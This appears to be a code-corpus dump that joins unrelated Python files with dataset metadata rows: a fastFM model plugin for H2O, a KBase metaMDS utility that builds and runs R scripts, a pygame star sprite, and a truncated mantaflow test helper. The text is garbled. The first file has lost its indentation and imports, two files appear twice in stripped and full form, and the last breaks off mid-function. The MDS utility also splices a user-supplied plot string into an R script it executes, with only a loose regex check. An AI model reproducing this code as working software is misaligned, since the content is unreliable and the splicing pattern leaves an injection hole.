from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
class FastFMModel(CustomModel):
_regression = True
_binary = True
_multiclass = False # WIP
_display_name = "fastFM"
_description = "LibFM implementation of fastFM"
# als.FMRegression(n_iter=1000, init_stdev=0.1, rank=2, l2_reg_w=0.1, l2_reg_V=0.5)
_modules_needed_by_name = ['fastFM']
@staticmethod
def is_enabled():
# fails sometimes with
# ffm_als_mcmc.c:172: sparse_fit: Assertion `(sizeof (*w_0) == sizeof (float) ? __finitef (*w_0) :
# sizeof (*w_0) == sizeof (double) ? __finite (*w_0) : __finitel (*w_0)) && "w_0 not finite"' failed.
return False
def set_default_params(self,
accuracy=None, time_tolerance=None, interpretability=None,
**kwargs):
n_iter = min(max(kwargs['n_iter'], 1), 100000) if 'n_iter' in kwargs else 100
init_stdev = max(kwargs['init_stdev'], 0.000001) if 'init_stdev' in kwargs else 0.1
rank = min(max(kwargs['rank'], 0), 2) if 'rank' in kwargs else 2
l2_reg_w = max(kwargs['l2_reg_w'], 0.000000001) if 'l2_reg_w' in kwargs else 0.1
l2_reg_V = max(kwargs['l2_reg_V'], 0.000000001) if 'l2_reg_V' in kwargs else 0.5
# random_state = kwargs['random_state'] if 'random_state' in kwargs else 12345
self.params = {'n_iter': n_iter,
'init_stdev': init_stdev,
'rank': rank,
'l2_reg_w': l2_reg_w,
'l2_reg_V': l2_reg_V,
}
def mutate_params(self,
accuracy=10,
**kwargs):
if accuracy > 8:
list_of_n_iter = [200, 300, 400, 500, 1000, 2000]
elif accuracy >= 5:
list_of_n_iter = [50, 100, 200, 300, 400, 500]
else:
list_of_n_iter = [10, 50, 100, 150, 200, 250, 300]
list_of_init_stdev = [0.0001, 0.001, 0.01, 0.1, 0.5, 1.]
list_of_reg_w = [0.0001, 0.001, 0.01, 0.1, 1., 3., 10.]
list_of_l2_reg_V = [0.001, 0.01, 0.1, 1., 3., 10., 20.]
n_iter_index = np.random.randint(0, high=len(list_of_n_iter))
reg_w_index = np.random.randint(0, high=len(list_of_reg_w))
reg_V_index = np.random.randint(0, high=len(list_of_l2_reg_V))
init_stdev_index = np.random.randint(0, high=len(list_of_init_stdev))
n_iter = list_of_n_iter[n_iter_index]
reg_w = list_of_reg_w[reg_w_index]
reg_V = list_of_l2_reg_V[reg_V_index]
init_stdev = list_of_init_stdev[init_stdev_index]
rank = 2
self.params = {'n_iter': n_iter,
'init_stdev': init_stdev,
'rank': rank,
'l2_reg_w': reg_w,
'l2_reg_V': reg_V,
}
def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):
from fastFM import als
X = dt.Frame(X)
orig_cols = list(X.names)
if self.num_classes >= 2:
model = als.FMClassification(n_iter=self.params["n_iter"], init_stdev=self.params["init_stdev"],
rank=self.params["rank"], l2_reg_w=self.params["l2_reg_w"],
l2_reg_V=self.params["l2_reg_V"], random_state=self.random_state)
lb = LabelEncoder()
lb.fit(self.labels)
y = lb.transform(y)
y[y != 1] = -1
else:
model = als.FMRegression(n_iter=self.params["n_iter"], init_stdev=self.params["init_stdev"],
rank=self.params["rank"], l2_reg_w=self.params["l2_reg_w"],
l2_reg_V=self.params["l2_reg_V"], random_state=self.random_state)
self.means = dict()
self.standard_scaler = StandardScaler()
for col in X.names:
XX = X[:, col]
self.means[col] = XX.mean1()
if np.isnan(self.means[col]):
self.means[col] = 0
XX.replace(None, self.means[col])
X[:, col] = XX
assert X[dt.isna(dt.f[col]), col].nrows == 0
X = X.to_numpy()
X = self.standard_scaler.fit_transform(X)
X = csr_matrix(X) # requires sparse matrix
model.fit(X, y)
importances = np.array(abs(model.w_))
self.set_model_properties(model=model,
features=orig_cols,
importances=importances.tolist(), # abs(model.coef_[0])
iterations=0)
def predict(self, X, **kwargs):
from fastFM import als
X = dt.Frame(X)
for col in X.names:
XX = X[:, col]
XX.replace(None, self.means[col])
X[:, col] = XX
pred_contribs = kwargs.get('pred_contribs', None)
output_margin = kwargs.get('output_margin', None)
model, _, _, _ = self.get_model_properties()
X = X.to_numpy()
X = self.standard_scaler.transform(X)
X = csr_matrix(X) # requires sparse matrix
if not pred_contribs:
if self.num_classes == 1:
preds = model.predict(X)
else:
preds = np.array(model.predict_proba(X))
preds = np.column_stack((1 - preds, preds))
# preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())
return preds
else:
raise NotImplementedError("No Shapley for SVM")
| 5,106 | 447 | 23 |
da62656679c6f24aafd02686ce50bd44338b6f04 | 25,831 | py | Python | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
| 43.268007 | 121 | 0.597964 |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
class MDSUtils:
R_BIN = '/kb/deployment/bin'
MDS_OUT_DIR = 'mds_output'
PARAM_IN_WS = 'workspace_name'
PARAM_IN_MATRIX = 'input_obj_ref'
PARAM_OUT_MATRIX = 'mds_matrix_name'
def _mkdir_p(self, path):
"""
_mkdir_p: make directory for given path
"""
if not path:
return
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def _validate_run_mds_params(self, params):
"""
_validate_run_mds_params:
validates params passed to run_mds method
"""
logging.info('start validating run_mds params')
# check for required parameters
for p in [self.PARAM_IN_MATRIX, self.PARAM_IN_WS, self.PARAM_OUT_MATRIX]:
if p not in params:
raise ValueError('"{}" parameter is required, but missing'.format(p))
def _build_rMDS_script(self, params):
"""
_build_rMDS_script: build a sequence of R command calls according to params
Note: To run the NMDS, we will use the function metaMDS from the vegan package.
# The metaMDS function requires only a community-by-species matrix.
"""
data_file_path = params.get('datafile', None)
if not data_file_path:
return ''
exists = os.path.isfile(os.path.join(self.output_dir, os.path.basename(data_file_path)))
if not exists:
shutil.copyfile(data_file_path,
os.path.join(self.output_dir, os.path.basename(data_file_path)))
n_components = params.get('n_components', 2)
max_iter = params.get('max_iter', 300)
run_metric = True if params.get('metric', 0) else False
dist_metric = params.get('distance_metric', 'bray')
mds_cfg = 'distance="' + dist_metric + '",try=20,trymax=' + str(max_iter) + \
',autotransform=TRUE,noshare=0.1,expand=TRUE,trace=1,' + \
'plot=FALSE,engine=c("monoMDS","isoMDS"),k=' + str(n_components)
if run_metric:
mds_cfg += 'metric=True'
mds_scrpt = 'library(vegan)\n'
mds_scrpt += 'library(jsonlite)\n'
mds_scrpt += 'vg_data <- read.table("' + data_file_path + \
'",header=TRUE,row.names=1,sep="")\n'
# remove the last (taxonomy) column
# mds_scrpt += 'vg_data<-vg_data[,1:dim(vg_data)[2]-1]\n'
# Function metaMDS returns an object of class metaMDS.
mds_scrpt += 'vg_data.mds <- metaMDS(vg_data,' + mds_cfg + ')\n'
mds_scrpt += 'vg_data.mds\n'
# save the results in the memory
# 1) store species ordination
mds_scrpt += 'variableScores <- vg_data.mds$species\n'
# 2) store site ordination
mds_scrpt += 'sampleScores <- vg_data.mds$points\n'
# 3) store other ordination results
mds_scrpt += 'stress <- vg_data.mds$stress\n'
mds_scrpt += 'dist_metric <- vg_data.mds$distance\n'
mds_scrpt += 'dist_matrix <- vg_data.mds$diss\n'
mds_scrpt += 'dist_call <- vg_data.mds$distcall\n'
mds_scrpt += 'converged <- vg_data.mds$converged\n'
mds_scrpt += 'dims <- vg_data.mds$ndim\n'
mds_scrpt += 'tries <- vg_data.mds$tries\n'
mds_scrpt += 'maxits <- vg_data.mds$maxits\n'
mds_scrpt += 'func_call <- vg_data.mds$call\n'
mds_scrpt += 'mds_data <- vg_data.mds$data\n'
# save the results to the current dir
# Write CSV in R
mds_scrpt += 'write.csv(dist_matrix,file="dist_matrix.csv",row.names=TRUE,na="")\n'
mds_scrpt += 'write.csv(variableScores,file="species_ordination.csv",' + \
'row.names=TRUE,na="")\n'
mds_scrpt += 'write.csv(sampleScores,file="site_ordination.csv",row.names=TRUE,na="")\n'
# Write JSON in R
mds_scrpt += 'write_json(toJSON(dist_matrix),path="dist_matrix.json",pretty=TRUE,' + \
'auto_unbox=FALSE)\n'
mds_scrpt += 'write_json(toJSON(variableScores),path="species_ordination.json",' + \
'pretty=TRUE,auto_unbox=FALSE)\n'
mds_scrpt += 'write_json(toJSON(sampleScores),path="site_ordination.json",' + \
'pretty=TRUE,auto_unbox=FALSE)\n'
mds_scrpt += 'item_name=c("stress","distance_metric","dist_call","converged",' + \
'"dimesions","trials","maxits")\n'
mds_scrpt += 'item_value=c(stress,dist_metric,dist_call,converged,dims,tries,maxits)\n'
mds_scrpt += 'df <- data.frame(item_name,item_value,stringsAsFactors=FALSE)\n'
mds_scrpt += 'write_json(toJSON(df),path="others.json",pretty=TRUE,auto_unbox=FALSE)\n'
# save mds plots
mds_scrpt += 'bmp(file="saving_mds_plot.bmp",width=580,height=580,units="px",' + \
'res=100, pointsize=12)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'points(vg_data.mds)\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="saving_mds_plot.pdf",width=6,height=6)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'points(vg_data.mds)\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="mds_plot_withlabel.pdf",width=6,height=6)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'ordilabel(vg_data.mds,dis="sites",cex=1.2,font=3,fill="hotpink",col="blue")\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="mds_plot_withcolor.pdf",width=6,height=6)\n'
mds_scrpt += 'fig <- ordiplot(vg_data.mds,type="none")\n'
mds_scrpt += 'points(fig,"sites",pch=21,col="red",bg="yellow")\n'
mds_scrpt += 'points(fig,"species",pch=21,col="green",bg="blue")\n'
# mds_scrpt += 'text(fig, "species", col="blue", cex=0.9)\n'
mds_scrpt += 'dev.off()\n'
# If there is user input plotting script:
plt_scrpt = params.get('plot_script', '').lower()
if plt_scrpt and re.match("^plot\(\s*[a-zA-Z]+.*\)$", plt_scrpt):
arr_plt = plt_scrpt.split(',')
arr_plt[0] = 'plot(vg_data.mds' # make sure to pass the correct data
plt_scrpt = (',').join(arr_plt)
if len(arr_plt) == 1:
plt_scrpt += ')'
plt_type = params.get('plot_type', 'pdf').lower()
if not plt_type:
plt_type = 'pdf'
plt_name = params.get('plot_name', 'usr_plt_name').lower()
if not plt_name:
plt_name = 'usr_plt_name'
plt_name += '.' + plt_type
if plt_type == 'jpg':
plt_type = 'jpeg'
if plt_type == 'ps':
plt_type = 'postscript'
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '")\n'
if plt_type == 'tiff':
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '",width=4,height=4,units="in",' + \
'compression="lzw",res=300)\n'
if plt_type in ['jpg', 'jpeg', 'bmp', 'png']:
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '",width=580,height=580,units="px",' + \
'res=100, pointsize=12)\n'
mds_scrpt += plt_scrpt + '\n'
mds_scrpt += 'dev.off()\n'
logging.info('R script: {}'.format(mds_scrpt))
mds_rscript = 'mds_script.R'
rscrpt_file_path = os.path.join(self.output_dir, mds_rscript)
with open(rscrpt_file_path, 'w') as r_file:
r_file.write(mds_scrpt)
return rscrpt_file_path
def _execute_r_script(self, rfile_name):
"""
_execute_r_script: Calling the Rscript executable to run the R script in rfile_name
"""
logging.info('Calling R......')
result_dir = os.path.dirname(rfile_name)
if not result_dir:
result_dir = self.working_dir
rcmd = [os.path.join(self.R_BIN, 'Rscript')]
rcmd.append(rfile_name)
logging.info('Running metaMDS script in current working directory: {}'.format(result_dir))
exitCode = 0
try:
complete_proc = subprocess.run(rcmd, cwd=result_dir, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
close_fds=True)
exitCode = complete_proc.returncode
if (exitCode == 0):
logging.info('\n{}'.format(complete_proc.stdout))
logging.info('\n{} was executed successfully, exit code was: {}'.format(
' '.join(rcmd), str(exitCode)))
logging.info("Finished calling R.")
else:
logging.info('Error running command: {} Exit Code: '.format(
' '.join(rcmd), str(exitCode)))
logging.info('\n{}'.format(complete_proc.stderr))
except subprocess.CalledProcessError as sub_e:
exitCode = -99
logging.info('Caught subprocess.CalledProcessError {}'.format(sub_e))
return exitCode
def _df_to_list(self, df):
"""
_df_to_list: convert Dataframe to FloatMatrix2D matrix data
"""
df.index = df.index.astype('str')
df.columns = df.columns.astype('str')
df.fillna(0, inplace=True)
matrix_data = {'row_ids': df.index.tolist(),
'col_ids': df.columns.tolist(),
'values': df.values.tolist()}
return matrix_data
def _mds_df_to_excel(self, mds_df, distance_df, result_dir, mds_matrix_ref):
"""
write MDS matrix df into excel
"""
logging.info('writting mds data frame to excel file')
mds_matrix_obj = self.dfu.get_objects({'object_refs': [mds_matrix_ref]})['data'][0]
mds_matrix_info = mds_matrix_obj['info']
mds_matrix_name = mds_matrix_info[1]
file_path = os.path.join(result_dir, mds_matrix_name + ".xlsx")
writer = pd.ExcelWriter(file_path)
mds_df.to_excel(writer, "mds_matrix", index=True)
if distance_df:
distance_df.to_excel(writer, "mds_distance_matrix", index=True)
writer.close()
def _Matrix2D_to_df(self, Matrix2D):
"""
_Matrix2D_to_df: transform a FloatMatrix2D to data frame
"""
index = Matrix2D.get('row_ids')
columns = Matrix2D.get('col_ids')
values = Matrix2D.get('values')
df = pd.DataFrame(values, index=index, columns=columns)
return df
def _mds_to_df(self, mds_matrix_ref):
"""
retrieve MDS matrix ws object to mds_df
"""
logging.info('converting mds matrix to data frame')
mds_data = self.dfu.get_objects({'object_refs': [mds_matrix_ref]})['data'][0]['data']
rotation_matrix_data = mds_data.get('rotation_matrix')
distance_matrix_data = mds_data.get('distance_matrix')
original_matrix_ref = mds_data.get('original_matrix_ref')
dimension = mds_data.get('mds_parameters').get('n_components')
mds_df = self._Matrix2D_to_df(rotation_matrix_data)
distance_df = None
if distance_matrix_data:
distance_df = self._Matrix2D_to_df(distance_matrix_data)
if original_matrix_ref:
logging.info('appending instance group information to mds data frame')
obj_data = self.dfu.get_objects(
{'object_refs': [original_matrix_ref]})['data'][0]['data']
attributemapping_ref = obj_data.get('{}_attributemapping_ref'.format(dimension))
am_data = self.dfu.get_objects(
{'object_refs': [attributemapping_ref]})['data'][0]['data']
attributes = am_data.get('attributes')
instances = am_data.get('instances')
am_df = pd.DataFrame(data=list(instances.values()),
columns=list(map(lambda x: x.get('attribute'), attributes)),
index=instances.keys())
mds_df = mds_df.merge(am_df, left_index=True, right_index=True, how='left',
validate='one_to_one')
return mds_df, distance_df
def _save_mds_matrix(self, workspace_name, input_obj_ref, mds_matrix_name,
distance_df, mds_params_df, site_ordin_df, species_ordin_df):
logging.info('Saving MDSMatrix...')
if not isinstance(workspace_name, int):
ws_name_id = self.dfu.ws_name_to_id(workspace_name)
else:
ws_name_id = workspace_name
mds_data = {}
mds_data.update({'distance_matrix': self._df_to_list(distance_df)})
mds_data.update({'site_ordination': self._df_to_list(site_ordin_df)})
mds_data.update({'species_ordination': self._df_to_list(species_ordin_df)})
mds_data.update({'mds_parameters': self._df_to_list(mds_params_df)})
mds_data.update({'original_matrix_ref': input_obj_ref})
mds_data.update({'rotation_matrix': self._df_to_list(distance_df)})
obj_type = 'KBaseExperiments.PCAMatrix'
info = self.dfu.save_objects({
"id": ws_name_id,
"objects": [{
"type": obj_type,
"data": mds_data,
"name": mds_matrix_name
}]
})[0]
return "%s/%s/%s" % (info[6], info[0], info[4])
def _zip_folder(self, folder_path, output_path):
"""
_zip_folder: Zip the contents of an entire folder (with that folder included in the
archive). Empty subfolders could be included in the archive as well if the 'Included
all subfolders, including empty ones' portion.
portion is used.
"""
with zipfile.ZipFile(output_path, 'w',
zipfile.ZIP_DEFLATED,
allowZip64=True) as ziph:
for root, folders, files in os.walk(folder_path):
# Include all subfolders, including empty ones.
for folder_name in folders:
absolute_fpath = os.path.join(root, folder_name)
relative_fpath = os.path.join(os.path.basename(root), folder_name)
logging.info("Adding folder {} to archive.".format(absolute_fpath))
ziph.write(absolute_fpath, relative_fpath)
for f in files:
absolute_path = os.path.join(root, f)
relative_path = os.path.join(os.path.basename(root), f)
logging.info("Adding file {} to archive.".format(absolute_path))
ziph.write(absolute_path, relative_path)
logging.info("{} created successfully.".format(output_path))
def _generate_output_file_list(self, out_dir):
"""
_generate_output_file_list: zip result files and generate file_links for report
"""
logging.info('Start packing result files from MDS...')
output_files = list()
output_dir = os.path.join(self.working_dir, str(uuid.uuid4()))
self._mkdir_p(output_dir)
mds_output = os.path.join(output_dir, 'metaMDS_output.zip')
self._zip_folder(out_dir, mds_output)
output_files.append({'path': mds_output,
'name': os.path.basename(mds_output),
'label': os.path.basename(mds_output),
'description': 'Output file(s) generated by metaMDS'})
return output_files
def _generate_mds_html_report(self, mds_outdir, n_components):
logging.info('Start generating html report for MDS results...')
html_report = list()
result_dir = os.path.join(self.working_dir, str(uuid.uuid4()))
self._mkdir_p(result_dir)
result_file_path = os.path.join(result_dir, 'mds_result.html')
mds_plots = list()
for root, folders, files in os.walk(mds_outdir):
# Find the image files by their extensions.
for f in files:
if re.match('^[a-zA-Z]+.*.(jpeg|jpg|bmp|png|tiff|pdf|ps)$', f):
absolute_path = os.path.join(root, f)
logging.info("Adding file {} to plot archive.".format(absolute_path))
mds_plots.append(absolute_path)
visualization_content = ''
for mds_plot in mds_plots:
shutil.copy2(mds_plot,
os.path.join(result_dir, os.path.basename(mds_plot)))
visualization_content += '<iframe height="900px" width="100%" '
visualization_content += 'src="{}" '.format(os.path.basename(mds_plot))
visualization_content += 'style="border:none;"></iframe>\n<p></p>\n'
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'mds_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
report_template = report_template.replace('n_components',
'{} Components'.format(n_components))
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': result_dir,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for MDS Matrix App'
})
return html_report
def _generate_mds_report(self, mds_ref, output_dir, workspace_name, n_components):
logging.info('Creating MDS report...')
output_files = self._generate_output_file_list(output_dir)
output_html_files = self._generate_mds_html_report(output_dir, n_components)
objects_created = list()
objects_created.append({'ref': mds_ref,
'description': 'MDS Matrix'})
report_params = {'message': '',
'workspace_name': workspace_name,
'file_links': output_files,
'objects_created': objects_created,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 666,
'report_object_name': 'kb_mds_report_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def __init__(self, config):
self.ws_url = config["workspace-url"]
self.callback_url = config['SDK_CALLBACK_URL']
self.token = config['KB_AUTH_TOKEN']
self.scratch = config['scratch']
self.dfu = DataFileUtil(self.callback_url, service_ver='release')
self.working_dir = self.scratch
self.data_util = DataUtil(config)
self.dfu = DataFileUtil(self.callback_url)
self.output_dir = os.path.join(self.working_dir, self.MDS_OUT_DIR)
self._mkdir_p(self.output_dir)
def run_metaMDS(self, params):
"""
run_metaMDS: perform metaMDS analysis on matrix
:param input_obj_ref: object reference of a matrix
:param workspace_name: the name of the workspace
:param mds_matrix_name: name of MDS (KBaseExperiments.MDSMatrix) object
dimension: compute correlation on column or row, one of ['col', 'row']
:param n_components - dimentionality of the reduced space (default 2)
:param max_iter: maximum iterations allowed
:param metric: indication of running metric or non-metric MDS
:param distance_metric: distance the ordination will be performed on, default to "bray"
"""
logging.info('--->\nrunning metaMDS with input\n' +
'params:\n{}'.format(json.dumps(params, indent=1)))
self._validate_run_mds_params(params)
input_obj_ref = params.get(self.PARAM_IN_MATRIX)
workspace_name = params.get(self.PARAM_IN_WS)
mds_matrix_name = params.get(self.PARAM_OUT_MATRIX)
dimension = params.get('dimension', 'row')
n_components = int(params.get('n_components', 2))
res = self.dfu.get_objects({'object_refs': [input_obj_ref]})['data'][0]
obj_data = res['data']
obj_name = res['info'][1]
obj_type = res['info'][2]
max_size = len(obj_data['data']['col_ids'])
if n_components > max_size:
raise ValueError('Number of components should be less than number of samples')
exitCode = -99
if "KBaseMatrices" in obj_type:
# create the input file from obj_data
matrix_tab = obj_data['data']['values']
row_ids = obj_data['data']['row_ids']
col_ids = obj_data['data']['col_ids']
matrix_df = pd.DataFrame(matrix_tab, index=row_ids, columns=col_ids)
matrix_data_file = os.path.join(self.output_dir, obj_name + '.csv')
with open(matrix_data_file, 'w') as m_file:
matrix_df.to_csv(m_file, sep='\t')
params['datafile'] = matrix_data_file
exitCode = self.run_metaMDS_with_file(params)
else:
err_msg = 'Ooops! [{}] is not supported.\n'.format(obj_type)
err_msg += 'Please provide a KBaseMatrices object'
raise ValueError("err_msg")
if exitCode == -99:
raise ValueError('Caught subprocess.CalledProcessError while calling R.')
# saving the mds_matrix object
# read metaMDS results from files into data frames
dist_matrix_df = pd.read_csv(os.path.join(self.output_dir, "dist_matrix.csv"))
mds_params_df = pd.read_json(os.path.join(self.output_dir, "others.json"))
site_ordin_df = pd.read_csv(os.path.join(self.output_dir, "site_ordination.csv"))
species_ordin_df = pd.read_csv(os.path.join(self.output_dir, "species_ordination.csv"))
mds_ref = self._save_mds_matrix(workspace_name, input_obj_ref, mds_matrix_name,
dist_matrix_df, mds_params_df, site_ordin_df,
species_ordin_df)
returnVal = {'mds_ref': mds_ref}
# generating report
report_output = self._generate_mds_report(mds_ref, self.output_dir,
workspace_name, n_components)
returnVal.update(report_output)
return returnVal
def run_metaMDS_with_file(self, params):
"""
run_metaMDS_with_file: perform metaMDS analysis on matrix
:param datafile: a file that contains the matrix data
:param workspace_name: the name of the workspace
:param mds_matrix_name: name of MDS (KBaseExperiments.MDSMatrix) object
:param n_components - dimentionality of the reduced space (default 2)
:param max_iter: maximum iterations allowed
:param metric: indication of running metric or non-metric MDS
:param distance_metric: distance the ordination will be performed on, default to "bray"
"""
logging.info('--->\nrunning metaMDS with input \n' +
'params:\n{}'.format(json.dumps(params, indent=1)))
rscrpt_file = self._build_rMDS_script(params)
logging.info('--->\nR script file has been written to {}'.format(rscrpt_file))
return self._execute_r_script(rscrpt_file)
def export_mds_matrix_excel(self, params):
"""
export MDSMatrix as Excel
"""
logging.info('start exporting mds matrix')
mds_matrix_ref = params.get('input_ref')
mds_df, components_df = self._mds_to_df(mds_matrix_ref)
result_dir = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_dir)
self._mds_df_to_excel(mds_df, components_df, result_dir, mds_matrix_ref)
package_details = self.dfu.package_for_download({
'file_path': result_dir,
'ws_refs': [mds_matrix_ref]
})
return {'shock_id': package_details['shock_id']}
def test_run_metaMDS(self, params):
input_obj_ref = params.get(self.PARAM_IN_MATRIX)
workspace_name = params.get(self.PARAM_IN_WS)
mds_matrix_name = params.get(self.PARAM_OUT_MATRIX)
dimension = params.get('dimension', 'row')
n_components = int(params.get('n_components', 2))
color_marker = params.get('color_marker_by')
scale_seize = params.get('scale_size_by')
for item in [input_obj_ref, workspace_name, mds_matrix_name, dimension, n_components, color_marker, scale_seize]:
print(item)
| 5,705 | 19,790 | 23 |
87da8a733dcef29dd32be297bf9fda26b92a975c | 1,525 | py | Python | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
"""Uma classe que representa uma unica estrela"""
def __init__(self, tela, janela):
"""Inicializa a estrela e define sua posicao inicial."""
super(Estrela, self).__init__()
self.janela = janela
self.tela = tela
# Carrega a imagem do alienigena e define seu atributo rect
self.imagem = pygame.image.load('emoji.png')
self.imagem = pygame.transform.scale(self.imagem, [15, 15])
self.rect = pygame.Rect(0, 0, 0, 0)
# Inica cada novo estrela a parte superios da tela
# Armazena a posicao exata da estrela
self.x = float(self.rect.x)
def desenha_estrela(self):
"""Desenha a estrela em sua posicao actual"""
if self.janela[0] > self.rect.x:
self.rect.x += 30
self.tela.blit(self.imagem, self.rect)
print('desenhei x')
elif self.janela[1] > self.rect.y:
self.rect.x = 0
self.rect.y += 30
inicia_jogo() | 26.754386 | 67 | 0.602623 | import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
"""Uma classe que representa uma unica estrela"""
def __init__(self, tela, janela):
"""Inicializa a estrela e define sua posicao inicial."""
super(Estrela, self).__init__()
self.janela = janela
self.tela = tela
# Carrega a imagem do alienigena e define seu atributo rect
self.imagem = pygame.image.load('emoji.png')
self.imagem = pygame.transform.scale(self.imagem, [15, 15])
self.rect = pygame.Rect(0, 0, 0, 0)
# Inica cada novo estrela a parte superios da tela
# Armazena a posicao exata da estrela
self.x = float(self.rect.x)
def desenha_estrela(self):
"""Desenha a estrela em sua posicao actual"""
if self.janela[0] > self.rect.x:
self.rect.x += 30
self.tela.blit(self.imagem, self.rect)
print('desenhei x')
elif self.janela[1] > self.rect.y:
self.rect.x = 0
self.rect.y += 30
def inicia_jogo():
pygame.init()
tela_altura = 600
tela_largura = 1200
janela = (tela_largura, tela_altura)
tela = pygame.display.set_mode((tela_largura, tela_altura))
cor = 0, 0, 0
tela.fill(cor)
estrela = Estrela(tela, janela)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
estrela.desenha_estrela()
pygame.display.flip()
inicia_jogo() | 431 | 0 | 23 |
023de8aa7308628a653ef21d3dd78f164e3e9392 | 9,144 | py | Python | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 158 | 2018-06-24T17:42:13.000Z | 2022-03-12T13:29:43.000Z | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 5 | 2018-09-05T07:30:48.000Z | 2020-07-01T08:56:28.000Z | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 35 | 2018-06-13T04:05:42.000Z | 2022-03-29T16:55:24.000Z | #
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
# reset and generate info file with version string when in data gen mode
# read test data
# try to load uni file if it exists
# configure input filenames
# try to load uni file if it exists
| 36.722892 | 141 | 0.675962 | #
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
def checkResult( name, result, resultRel , thresh, threshStrict, invertResult=False ):
curr_thresh = thresh
# enable strict thresholds for double prec tests
if(getFloatSetting()==2):
curr_thresh = threshStrict
print ("Checking '%s', result=%f , thresh=%f" % ( name , result , curr_thresh) )
if ( ( result > 0.) and (result < 1e-04) ):
print ("Note: small difference: %f (output scaled by 1e5)" % ( result * 1e05 ) ) # debugging...
elif ( ( result > 0.) and (result < 1e-08) ):
print ("Note: small difference: %f (output scaled by 1e9)" % ( result * 1e09 ) ) # debugging...
#elif ( result == 0.0):
#print ("Result is really zero...")
allGood = 0
if ( result <= curr_thresh) :
allGood = 1
# for checks that should fail
if ( invertResult == True) :
if ( allGood == 0) :
allGood = 1
else:
allGood = 0
# now react on outcome...
if ( allGood == 1 ):
print("OK! Results for "+name+" match...")
return 0
else:
